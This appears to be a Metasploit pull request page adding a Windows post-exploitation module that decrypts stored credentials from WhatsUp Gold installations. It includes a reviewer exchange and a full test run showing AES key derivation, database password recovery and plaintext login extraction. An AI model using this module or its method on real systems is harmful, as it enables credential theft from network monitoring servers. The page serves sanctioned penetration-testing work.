rapid7
Add whatsupgold_credential_dump post module
Add a post module for credential extraction from WhatsUp Gold instances on Windows hosts. The module should theoretically decrypt ciphertext from any version of WhatsUp Gold, although it has only been verified working on WhatsUp Gold versions 11.0 through 22.0.
@bwatters-r7 good afternoon! Just pushed a commit that should hopefully address the issues you brought up. I was not able to totally abandon the way the registry keys are queried (mostly because registry_key_exist? does not seem to take a view argument) but have at least added sanity so now the module only checks SysWOW64 if the arch is detected 64-bit. Let me know if I need to refine anything else!
Tested the changes, and it works great! Thanks, will get this landed soon!
Test output
msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > run
[*] Hostname DESKTOP-5JSUGC8 IPv4 192.168.140.150
[*] WhatsUp Gold Build 22.1.39
[*] Init WhatsUp Gold crypto ...
[+] WhatsUp Gold Serial Number: 758ND8MHRFJAYC2
[+] WhatsUp Gold Dynamic Encryption Salt
[+] HEX: 79EA6EE2974301E3
[+] WhatsUp Gold Composed AES256
[+] KEY: 2DB8BFB24B65E6D174F36AD336A9EB504F473A95F72124FFA63DE32820C199CF
[+] IV: E885F00E24FAB2A41620A4514D025AD5
[*] Init WhatsUp Gold SQL ...
[+] WhatsUp Gold SQL Database Connection Configuration:
[+] Instance Name: DESKTOP-5JSUGC8\WHATSUP
[+] Database Name: WhatsUp
[+] Database User: WhatsUpGold_DESKTOP-5JSUGC8
[+] Database Pass: 0x!19NpaffeL1GMdy2FtlfUX3
[*] Performing export of WhatsUp Gold SQL database to CSV file
[*] Export WhatsUp Gold DB ...
[+] 3 WUG rows exported, 2 unique nCredentialTypeIDs
[+] Encrypted WhatsUp Gold Database Dump: /Users/space/.msf4/loot/20230317163237_default_192.168.140.150_whatsup_gold_enc_652441.txt
[*] Performing decryption of WhatsUp Gold SQL database
[+] 3 WUG rows loaded, 2 unique nCredentialTypeIDs
[*] Process WhatsUp Gold DB ...
[+] 3 WUG rows processed
[*] 3 rows recovered: 2 plaintext, 1 decrypted (0 blank)
[*] 3 rows written (0 blank rows withheld)
[+] 2 unique WUG nCredentialTypeID records recovered
[+] Recovered Credential: test
[+] L: DESKTOP-5JSUGC8\test
[+] P: S3cureP@ssword
[+] Decrypted WhatsUp Gold Database Dump: /Users/space/.msf4/loot/20230317163237_default_192.168.140.150_whatsup_gold_dec_517184.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/whatsupgold_credential_dump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
WhatsUp Gold Composed AES256 IV E885F00E24FAB2A41620A4514D025AD5 Nonreplayable hash
WhatsUp Gold Composed AES256 key 2DB8BFB24B65E6D174F36AD336A9EB504F473A95F72124FFA63DE32820C199CF Nonreplayable hash
WhatsUp Gold Dynamic Encryption Salt 79EA6EE2974301E3 Nonreplayable hash
192.168.140.150 192.168.140.150 1433/tcp (mssql) WhatsUpGold_DESKTOP-5JSUGC8 0x!19NpaffeL1GMdy2FtlfUX3 DESKTOP-5JSUGC8\WHATSUP Password
192.168.140.150 192.168.140.150 443/tcp (https) DESKTOP-5JSUGC8\test S3cureP@ssword test Password
Release Notes
This adds a post module that collects and decrypts credentials from WhatsUp Gold installs.